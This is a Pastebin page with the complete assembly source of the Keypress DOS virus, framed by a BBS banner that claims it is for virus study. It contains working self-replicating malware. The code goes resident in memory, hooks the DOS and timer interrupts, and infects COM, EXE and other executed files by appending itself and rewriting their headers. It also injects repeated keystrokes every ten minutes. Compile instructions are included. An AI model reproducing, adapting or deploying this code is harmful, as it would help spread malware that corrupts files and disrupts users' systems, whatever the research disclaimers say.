Advertisement
FlyFar

Keypress Virus Source Code

Jun 27th, 2023
1,324
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 28.25 KB | Cybersecurity | 0 0
  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ;********************************************************
  25. ; Source code of the Keypress Virus - Made by XSTC
  26. ; Made in A86 v3.07
  27. ;
  28. ; The Keypress Virus installs itself in top of DOS
  29. ; memory, without using DOS resident functions. It will
  30. ; hook int 1Ch (timer) and 21h (DOS) and will copy every
  31. ; 10 minutes during 2 seconds the keys you press five
  32. ; times (so if you press '1' it will be '111111') - if
  33. ; you press no key, it will usually give ESCs.
  34. ;
  35. ; In DOS 3+ it spreads to every file executed - so it
  36. ; can, besides COM/EXE, infect DRV/OVL/etc.
  37. ; It also spreads itself in DOS 1 and 2 with a special
  38. ; routine - in this case only COM/EXE files will be
  39. ; infected.
  40. ;
  41. ; It adds, after making full paragraphs of the file
  42. ; length, 1232 bytes to COM-files and 1216 to EXE.
  43. ;
  44. ; This code is only made to show the possibilities and
  45. ; dangers of a virus. It is only intended for research
  46. ; purposes - spreading a virus is prohibited by law.
  47. ;
  48. ; NOTE - The compiled code is not 100% compatible with
  49. ; the Keypress virus. A86 compiles the 'ADD BX,AX' and
  50. ; 'MOV DI,SI' different. This has totally no effect
  51. ; on the program.
  52. ;********************************************************
  53.  
  54. ; After compiling the new virus, enter the new size in paragraphs in VirParSize
  55. ; and compile again.
  56.  
  57. VirParSize    equ 4Ch                      ; Size of the original KeyPress virus
  58.  
  59. VirStart:     jmp long VirBegin
  60.               db 0
  61.  
  62. ComStart:     mov bx,cs               ; When the virus has infected a .COM file,
  63.               add bx,[102h]           ; this is the jump to the virus. Actually,
  64.               push bx                   ; this code is overwritten with the code
  65.               mov bx,offset VirBegin                  ; in the end of the virus.
  66.               push bx
  67.               retf
  68.  
  69. EB02          dw 02EBh                  ; 'jmp 104' - first 2 bytes in .COM file
  70.  
  71. VirSize       dw VirParSize shl 4                  ; Size of virus in whole pars
  72.  
  73. VirPars       dw VirParSize + 1                        ; Size of virus in pars+1
  74.  
  75. MaxComSize    dw 0FF00h-VirParSize  ; Max. size .COM file to infect (100h stack)
  76.  
  77. Com_or_exe    db 00h                                ; 0 = Com-File, 1 = Exe-File
  78. R_Ax          dw (?)
  79. R_Bx          dw (?)
  80. R_Cx          dw (?)
  81. R_Dx          dw (?)
  82. R_Di          dw (?)
  83. R_Si          dw (?)
  84. R_Bp          dw (?)
  85. R_Es          dw (?)
  86. R_Ds          dw (?)
  87. R_SS          dw (?)
  88. R_SP          dw (?)
  89.  
  90. Exe_CS        dw (?)
  91. Exe_IP        dw (?)
  92.  
  93.  
  94. VirBegin:     call Save_Regs                                    ; Start of virus
  95.               call Fix_cs_ss      ; Fix CS and SS of orig. prog (for .EXE files)
  96.               call Get_cs_ip                    ; Get CS and IP of original prog
  97.               call Check_res                      ; Check virus already resident
  98.               jb Exit_inst                                           ; Yes, quit
  99.  
  100.               call Inst_mem                                  ; Install in memory
  101.               jb Exit_inst                                         ; Error, quit
  102.  
  103.               call Inst_ints                                   ; Hook interrupts
  104. Exit_Inst:    jmp short Rst_regs_prg
  105.               nop
  106.  
  107. Jmp_Prg:      db 0EAh                                 ; Jump to original program
  108. PrgOfs        dw (?)
  109. PrgSeg        dw (?)
  110.  
  111. Check_res:    push ds
  112.               xor bx,bx
  113.               mov ds,bx
  114.               mov bx,600h                                ; Unused word in memory
  115.               cmp word ptr [bx],1                           ; Already installed?
  116.               jz Installed                                                 ; Yes
  117.  
  118.               mov word ptr [bx],1                                           ; No
  119.               stc
  120.  
  121. Installed:    cmc
  122.               pop ds
  123.               ret
  124.  
  125.  
  126. ;*** For .EXE: Fix orig-prog CS and SS ***
  127.  
  128. Fix_cs_ss:    test byte ptr [Com_or_exe],1
  129.               jz no_exe
  130.  
  131.               mov ax,es
  132.               add ax,10h
  133.               add Exe_cs,ax
  134.               add R_ss,ax
  135.  
  136. No_Exe:       ret
  137.  
  138.  
  139. ;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes ***
  140.  
  141. Get_cs_ip:    mov ax,[Exe_cs]
  142.               mov bx,[Exe_ip]
  143.               test byte ptr [Com_or_exe],1
  144.               jnz No_rest                 ; .EXE file: no restore of first bytes
  145.  
  146.               mov ax,es
  147.               mov bx,100h
  148.               mov cx,10h
  149.               mov si,offset First_bytes
  150.               mov di,100h
  151.               cld
  152.               repz                          ; Restore first 16 bytes (.COM file)
  153.               movsb
  154.  
  155. No_rest:      mov [Prgseg],ax
  156.               mov [Prgofs],bx
  157.               ret
  158.  
  159.  
  160. ;*** Proc: Save the registers to restore them after the virus has ended ***
  161.  
  162. Save_Regs:    mov cs:R_ds,ds
  163.               push cs
  164.               pop ds
  165.               mov R_ax,ax
  166.               mov R_bx,bx
  167.               mov R_cx,cx
  168.               mov R_dx,dx
  169.               mov R_di,di
  170.               mov R_si,si
  171.               mov R_bp,bp
  172.               mov R_es,es
  173.               ret
  174.  
  175.  
  176. ;*** Restore regs for original program ***
  177.  
  178. Rst_regs_prg: mov ax,R_ax
  179.               mov bx,R_bx
  180.               mov cx,R_cx
  181.               mov dx,R_dx
  182.               mov bp,R_bp
  183.               mov di,R_di
  184.               mov si,R_si
  185.               mov es,R_es
  186.               test byte ptr [Com_or_exe],1
  187.               jz No_StackRest                  ; No stack restore for .COM files
  188.  
  189.               cli
  190.               mov ss,[R_ss]                                 ; Restore .EXE stack
  191.               mov sp,[R_sp]
  192.               sti
  193.  
  194. No_StackRest: mov ds,R_ds
  195.               jmp short jmp_prg
  196.  
  197.  
  198. ;*** Restore regs for interrupts ***
  199.  
  200. Rst_regs_int: mov ax,R_ax
  201.               mov bx,R_bx
  202.               mov cx,R_cx
  203.               mov dx,R_dx
  204.               mov bp,R_bp
  205.               mov di,R_di
  206.               mov si,R_si
  207.               mov es,R_es
  208.               mov ds,R_ds
  209.               ret
  210.  
  211.  
  212. ;*** Proc: Search for last MCB ***
  213.  
  214. Last_MCB:     push ds
  215.               mov bx,es
  216.               dec bx
  217.  
  218. Next_MCB:     mov ds,bx
  219.               cmp byte ptr [0],5Ah                                   ; Last MCB?
  220.               jz Is_last                                                   ; Yes
  221.               inc bx
  222.               add bx,[3]                                            ; Go to next
  223.               cmp bx,0A000h                                            ; In ROM?
  224.               jb Next_MCB                                     ; No, try next one
  225.  
  226. Is_Last:      pop ds
  227.               ret
  228.  
  229.  
  230. ;*** Proc: Install virus in end of memory ***
  231.  
  232. Inst_Mem:     call Last_mcb                                    ; Search last MCB
  233.               cmp bx,0A000h                                            ; In ROM?
  234.               jb Not_ROM                                          ; No, continue
  235.  
  236. No_Inst:      push cs                                                ; Yes, quit
  237.               pop ds
  238.               stc                                   ; Error, virus not installed
  239.               ret
  240.  
  241. Not_ROM:      mov ds,bx
  242.               mov ax,[3]                                    ; AX = Size last MCB
  243.               sub ax,cs:[VirPars]                      ; - (Virussize in pars+1)
  244.               jbe no_inst                              ; Not enough memory, quit
  245.               cmp ax,800h
  246.               jb no_inst                        ; Less than 2048 pars free, quit
  247.               mov [3],ax              ; Give program less space to install virus
  248.               add bx,ax
  249.               inc bx                                ; BX = seg where virus comes
  250.               mov es:[2],bx            ; Enter in PSP, program not allowed there
  251.               sub bx,10h                     ; - 10h pars (virus starts at 100h)
  252.               push bx
  253.               push cs
  254.               pop ds
  255.               pop es
  256.               mov si,100h
  257.               mov di,si
  258.               mov cx,[VirSize]                                  ; CX = virussize
  259.               cld
  260.               repz                                 ; Copy virus to virus-segment
  261.               movsb
  262.               clc                                    ; No error, virus installed
  263.               ret
  264.  
  265.  
  266. ;*** Install new interrupts (1C - Timer Tick, 21 - DOS) ***
  267.  
  268. Inst_Ints:    push es
  269.               pop ds
  270.               mov word ptr [Ticks],0
  271.               mov ax,351Ch                                 ; Get Addr Timer Tick
  272.               int 21h
  273.               mov I1c_ofs,bx
  274.               mov I1c_seg,es
  275.               mov ax,3521h                                    ; Get Addr DOS-Int
  276.               int 21h
  277.               mov I21_ofs,bx
  278.               mov I21_seg,es
  279.               mov ax,251Ch
  280.               mov dx,offset New_I1c
  281.               int 21h                               ; Install New Timer-Tick Int
  282.               mov dx,offset I21_dos12
  283.               push dx
  284.               mov ah,30h                                       ; Get DOS-Version
  285.               int 21h
  286.               pop dx
  287.               cmp al,3                                              ; Below 3.0?
  288.               jb DosBel3
  289.               mov dx,offset new_I21                                ; No, new int
  290. DosBel3:      mov ax,2521h                                 ; Install new DOS-Int
  291.               int 21h
  292.               push cs
  293.               pop ds
  294.               ret
  295.  
  296.  
  297. ;*** Proc: NEW 1C (TIMER TICK) INTERRUPT ***
  298. ; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the
  299. ; keyboard-interrupt.
  300.  
  301. Ticks         dw (?)
  302.  
  303. New_I1c:      inc word ptr cs:[Ticks]     ; Increment 'Ticks after virus loaded'
  304.               cmp word ptr cs:[Ticks],2A30h                 ; 10 minutes passed?
  305.               jb org_I1c                                   ; No, go to orig. I1c
  306.               cmp word ptr cs:[Ticks],2A54h                     ; 2 sec. passed?
  307.               jbe screw_keys                                ; Not yet, give ESCs
  308.               mov word ptr cs:[Ticks],0                      ; Time-counter to 0
  309.               jmp short Org_I1c                                ; Go to orig. I1c
  310. Screw_Keys:   push cx
  311.               mov cx,5                                          ; 5 times / tick
  312. Put_Key:      int 9                                             ; Give extra key
  313.               loop Put_key
  314.               pop cx
  315. Org_I1c:      db 0EAh                                    ; Jump far to orig. I1c
  316. I1c_Ofs       dw (?)
  317. I1c_Seg       dw (?)
  318.  
  319. New_I24:      mov al,0
  320.  
  321. New_I23:      iret
  322.  
  323. I23_Ofs       dw (?)
  324. I23_Seg       dw (?)
  325.  
  326. I24_Ofs       dw (?)
  327. I24_Seg       dw (?)
  328.  
  329. ProgSize      dw (?)                                ; Program size in paragraphs
  330.  
  331. New_I21:      cmp ax,4B00h                             ; New DOS Int for DOS 3 +
  332.               jz Is_Start
  333.               jmp far dword ptr cs:[I21_Ofs]                    ; Jmp orig. I 21
  334. Is_Start:     call Save_Regs
  335.               call InstCritInt               ; Install new ^c and crit. err. int
  336.               mov ax,3D02h                        ; Open file for read and write
  337.               mov ds,R_Ds
  338.               int 21h
  339.               push cs
  340.               pop ds
  341.               jc Close_File
  342.               mov bx,ax
  343.               call Read_header
  344.               jc Close_File
  345.               call Write_virus
  346.               jc Close_File
  347.               call Write_header
  348. Close_File:   mov ah,3Eh                                            ; Close file
  349.               int 21h
  350.               call RestCritInt                    ; Restore ^c and crit-err ints
  351.               call Rst_regs_int
  352.               jmp far dword ptr cs:[I21_Ofs]
  353.  
  354. I21_Dos12:    cmp ah,3Dh                       ; New DOS-Int for DOS 1.x and 2.x
  355.               jz Is_Open
  356.  
  357. JmpDos:       db 0EAh                                                 ; Jump Far
  358. I21_Ofs       dw (?)
  359. I21_Seg       dw (?)
  360.  
  361. Is_Open:      push ax                                           ; Network-flags?
  362.               and al,0FCh
  363.               pop ax
  364.               jnz JmpDos                                            ; Yes -> DOS
  365.  
  366.               call Save_Regs
  367.  
  368.               call InstCritInt               ; Install new ^c and crit. err. int
  369.  
  370.               mov DS,R_Ds
  371.               or al,2                                             ; Write access
  372.               pushf
  373.               cli
  374.               call far cs:[I21_Ofs]                                  ; Open file
  375.               push cs
  376.               pop ds
  377.               jc Open_Error                               ; Error opening -> DOS
  378.  
  379.               pushf
  380.               mov [R_Ax],ax                                        ; Save handle
  381.               mov bx,ax
  382.  
  383.               call Chk_Inf                         ; Check infection is possible
  384.               jc No_Infect                                          ; No -> quit
  385.  
  386.               call Read_header
  387.               jc No_Infect
  388.  
  389.               call Write_virus
  390.               jc No_Infect
  391.               call Write_header
  392. No_Infect:    call Go_file_beg                             ; Go to begin of file
  393.               call RestCritInt                    ; Restore ^c and crit-err ints
  394.               call Rst_regs_int
  395.               popf
  396.               retf 2
  397. Open_Error:   call RestCritInt                    ; Restore ^c and crit-err ints
  398.               call Rst_regs_int
  399.               jmp short JmpDos
  400.  
  401.  
  402. ;*** Proc: Buffer for header of program to infect ***
  403.  
  404. Head_buf      dw 0Ch dup (?)
  405.  
  406.  
  407. ;*** Proc: Install new ^C and crit. err. interrupt ***
  408.  
  409. InstCritInt:  push ax
  410.               push bx
  411.               push dx
  412.               push ds
  413.               push es
  414.               push cs
  415.               pop ds
  416.               mov ax,3523h                             ; Get Ctrl-Break Int Addr
  417.               int 21h
  418.               mov I23_Ofs,bx
  419.               mov I23_Seg,es
  420.               mov ax,3524h                              ; Get Crit. Err Int Addr
  421.               int 21h
  422.               mov I24_Ofs,bx
  423.               mov I24_Seg,es
  424.               mov ax,2523h
  425.               mov dx,offset New_I23                 ; Install new Ctrl-Break Int
  426.               int 21h
  427.               mov ax,2524h                           ; Install new Crit. Err Int
  428.               mov dx,offset New_I24
  429.               int 21h
  430.               pop es
  431.               pop ds
  432.               pop dx
  433.               pop bx
  434.               pop ax
  435.               ret
  436.  
  437.  
  438. ;*** Proc: Restore orig. ctrl-break and crit. err. interrupt ***
  439.  
  440. RestCritInt:  mov ax,2524h                           ; Rest. orig. crit. err int
  441.               lds dx,dword ptr cs:[I24_Ofs]
  442.               int 21h
  443.               mov ax,2523h                          ; Rest. orig. ctrl-break int
  444.               lds dx,dword ptr cs:[I23_Ofs]
  445.               int 21h
  446.               push cs
  447.               pop ds
  448.               ret
  449.  
  450.  
  451. ;*** Read header of file ***
  452.  
  453. Read_header:  mov ah,3Fh
  454.               mov dx,offset Head_buf
  455.               mov cx,18h
  456.               int 21h
  457.               jc HeadRead_Err                      ; Error reading, don't infect
  458.  
  459.               call Check_infect ; Check file already infected; if not, save data
  460.               jc HeadRead_Err                                      ; Error, quit
  461.  
  462.               call Calc_data                  ; Calculate data for infected file
  463.               jc HeadRead_Err                                      ; Error, quit
  464.  
  465. HeadRead_Err: ret
  466.  
  467.  
  468. ;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus ***
  469.  
  470. Write_virus:  mov ah,40h                            ; Write virus behind program
  471.               mov cx,[VirSize]
  472.               mov dx,100h
  473.               int 21h
  474.               jc Err_Writ                                    ; Write error, quit
  475.               cmp ax,cx
  476.               jnz Err_Writ                                   ; '   ' '   '  '  '
  477.               test byte ptr [Com_or_exe],1
  478.               jz First_Write
  479.               ret
  480.  
  481. First_Write:  mov ah,40h                 ; Write orig. 1st 16 bytes behind virus
  482.               mov cx,10h
  483.               mov dx,offset Head_buf
  484.               int 21h
  485.               jc Err_Writ                                    ; Write error, quit
  486.               cmp ax,cx
  487.               jnz Err_Writ                                   ; '   ' '   '  '  '
  488.               clc                                      ; End procedure, no error
  489.               ret
  490.  
  491. Err_Writ:     stc                                         ; End procedure, error
  492.               ret
  493.  
  494.  
  495. ;*** Proc: .COM: Write jump-to-virus, .EXE: Write header ***
  496.  
  497. Write_header: call Go_file_beg                             ; Go to begin of file
  498.               test byte ptr [Com_or_exe],1                          ; .EXE-file?
  499.               jnz Exe_header
  500.               mov ah,40h                             ; .COM file - Write 'EB 02'
  501.               mov cx,2
  502.               mov dx,offset EB02
  503.               int 21h
  504.               mov ah,40h                            ; Write program-size in pars
  505.               mov cx,2
  506.               mov dx,offset ProgSize
  507.               int 21h
  508.               mov ah,40h                          ; Write rest of begin of virus
  509.               mov cx,0Ch
  510.               mov dx,104h
  511.               int 21h
  512.               ret
  513.  
  514. Exe_header:   mov ah,40h                                         ; Write in File
  515.               mov cx,18h
  516.               mov dx,offset Head_buf
  517.               int 21h
  518.               ret
  519.  
  520.  
  521. ;*** Proc: Change file pointer ***
  522.  
  523. Cng_file_ptr: mov ax,4200h
  524.               int 21h
  525.               ret
  526.  
  527.  
  528. ;*** Proc: Go to begin of file ***
  529.  
  530. Go_file_beg:  xor cx,cx                                        ; Filepointer = 0
  531.               xor dx,dx
  532.               call Cng_file_ptr                            ; Change File Pointer
  533.               ret
  534.  
  535.  
  536. ;*** Proc: Check file is already infected ***
  537.  
  538. Check_infect: mov si,104h
  539.               mov di,offset Head_buf+4
  540.               push cs
  541.               pop es
  542.               mov byte ptr [Com_or_exe],0                        ; Flag for .COM
  543.               cmp word ptr [di-04],5A4Dh                              ; Is .EXE?
  544.               jz Is_Exe
  545.               mov cx,0Ch                                         ; No, .COM file
  546.               cld
  547.               repz                                           ; Already infected?
  548.               cmpsb
  549.               jnz Do_Infect                                            ; Not yet
  550. Dont_Infect:  stc
  551.               ret
  552. Do_Infect:    clc
  553.               ret
  554. Is_Exe:       mov byte ptr [Com_or_exe],1                        ; Flag for .EXE
  555.               mov cx,[offset Head_buf+14h]                        ; cx = Prog-IP
  556.               cmp cx,offset VirBegin                           ; Same as Vir-IP?
  557.               jz Dont_Infect                                         ; Yes, quit
  558.               cmp word ptr [offset Head_buf+0Ch],0           ; Max extra pars=0?
  559.               jz Dont_Infect                                         ; Yes, quit
  560.               mov [Exe_ip],cx                                     ; Save prog-IP
  561.               mov cx,[Head_buf+16h]
  562.               mov [Exe_cs],cx                                     ; Save prog-cs
  563.               mov cx,[Head_buf+0Eh]
  564.               mov [R_ss],cx                                       ; Save prog-SS
  565.               mov cx,[Head_buf+10h]
  566.               mov [R_sp],cx                                       ; Save prog-SP
  567.               jmp short Do_Infect
  568.  
  569.  
  570. ;*** Proc: Calculate data for infection ***
  571.  
  572. Calc_data:    mov ax,4202h                                           ; Go to EOF
  573.               xor cx,cx
  574.               xor dx,dx
  575.               int 21h
  576.               test al,0Fh         ; Size mod 16 = 0 (File is exact x paragraps)?
  577.               jz No_par_add                            ; Yes, no extra par added
  578.               add ax,10h                                         ; Add paragraph
  579.               adc dx,0                                      ; Overflow -> Inc dx
  580.               and ax,0FFF0h                                    ; Make paragraphs
  581. No_par_add:   test byte ptr [Com_or_exe],1
  582.               jnz Calc_exe
  583.               or dx,dx
  584.               jnz not_infect
  585.               cmp ax,[maxcomsize]                                ; File too big?
  586.               ja not_infect                                          ; Yes, quit
  587.               cmp ax,[VirSize]                                 ; File too small?
  588.               jbe Not_Infect                                         ; Yes, quit
  589.               mov [ProgSize],ax                              ; Save program-size
  590.               mov cl,4
  591.               shr word ptr [ProgSize],cl                         ; In paragraphs
  592.               mov dx,ax
  593.               xor cx,cx
  594.               call Cng_file_ptr                                      ; Go to EOF
  595.               clc
  596.               ret
  597. Not_Infect:   stc
  598.               ret
  599.  
  600. Calc_exe:     push ax
  601.               push dx
  602.               add ax,100h                                      ; 100 bytes stack
  603.               adc dx,0                                       ; Overflow - inc dx
  604.               mov cx,dx
  605.               mov dx,ax
  606.               call Cng_file_ptr                                      ; Go to EOF
  607.               push bx
  608.               add ax,[VirSize]                                  ; New exe-length
  609.               adc dx,0
  610.               mov bx,200h                                    ; For header: / 512
  611.               div bx
  612.               or dx,dx
  613.               jz No_Correct
  614.               inc ax          ; Files below 2.000.000h bytes - length correction
  615. No_Correct:   mov [Head_buf+2],dx                         ; Save new file-length
  616.               mov [Head_buf+4],ax                         ; '  ' ' ' '  ' '    '
  617.               pop bx
  618.               pop dx
  619.               pop ax
  620.               call Calc_cs_ss
  621.               mov word ptr [Head_buf+10h],100h                    ; Prog-SP=100h
  622.               mov word ptr [Head_buf+14h],offset VirBegin          ; Set prog-IP
  623.               clc
  624.               ret
  625.  
  626.  
  627. ;*** Proc: Calculate new CS and SS for .EXE file ***
  628.  
  629. Calc_cs_ss:   push cx
  630.               mov cx,4
  631. Cs_ss_lp:     shr dx,1
  632.               rcr ax,1
  633.               loop Cs_ss_lp
  634.               sub ax,[Head_buf+8]                               ; Size of header
  635.               sbb dx,0
  636.               mov [Head_buf+0Eh],ax                               ; Save prog-SS
  637.               mov [Head_buf+16h],ax                               ; Save prog-cs
  638.               pop cx
  639.               ret
  640.  
  641.  
  642. ;*** Check infection is possible ***
  643.  
  644. Chk_Inf:      call Chk_exec                           ; Check file is executable
  645.               jb Not_exec
  646.               call Get_attr                         ; Check file has no SYS attr
  647. Not_Exec:     ret
  648.  
  649.  
  650. ;*** Search-paths ***
  651.  
  652. Com_path      db '.COM',0
  653.  
  654. Exe_path      db '.EXE',0
  655.  
  656.  
  657. ;*** Check file is executable (.COM / .EXE)
  658.  
  659. Chk_Exec:     push es
  660.               mov es,R_ds
  661.               mov di,dx
  662.               xor al,al
  663.               mov cx,80h
  664.               cld
  665.               repnz                                                 ; Search '.'
  666.               scasb
  667.               jnz not_inf                                         ; No '.' found
  668.               dec di
  669.               push di
  670.               mov si,offset Com_path+4
  671.               mov cx,4
  672.               std
  673.               repz                                                ; Check '.COM'
  674.               cmpsb
  675.               pop di
  676.               jnz no_com                                               ; No .COM
  677.               clc
  678.               jmp short Infect
  679.               nop
  680. Not_Inf:      stc
  681.  
  682. Infect:       cld
  683.               pop es
  684.               ret
  685. No_Com:       mov si,offset Exe_path+4
  686.               mov cx,4
  687.               repz                                                ; Check '.EXE'
  688.               cmpsb
  689.               jnz not_inf                      ; No .EXE either - not executable
  690.               clc
  691.               jmp short infect
  692.  
  693. Get_Attr:     push ds
  694.               mov ax,4300h                                        ; Get FileAttr
  695.               xor cx,cx
  696.               mov ds,R_ds
  697.               int 21h
  698.               pop ds
  699.               jb Bad_Attr                                 ; Error - don't infect
  700.               test cx,4                                           ; System-Attr?
  701.               jnz Bad_Attr                                   ; Yes, don't infect
  702.               clc
  703.               ret
  704.  
  705. Bad_Attr:     stc
  706.               ret
  707.  
  708. First_bytes:  int 20h     ; First bytes of orig. program - here just 'Go to DOS'
  709.               dw (?)
  710.               mov bx,cs                                   ; Overwrites the begin
  711.               add bx,[102h]
  712.               push bx
  713.               mov bx,offset VirBegin
  714.               push bx
  715.               retf
  716.  
  717. ;****************************************************************************;
  718. ;                                                                            ;
  719. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  720. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  721. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  722. ;                     -=]                            [=-                     ;
  723. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  724. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  725. ;                     -=]                            [=-                     ;
  726. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  727. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  728. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  729. ;                                                                            ;
  730. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  731. ;                                                                            ;
  732. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  733. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  734. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  735. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  736. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  737. ; Is. Keep This Code in Responsible Hands!                                   ;
  738. ;                                                                            ;
  739. ;****************************************************************************;
Tags: virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement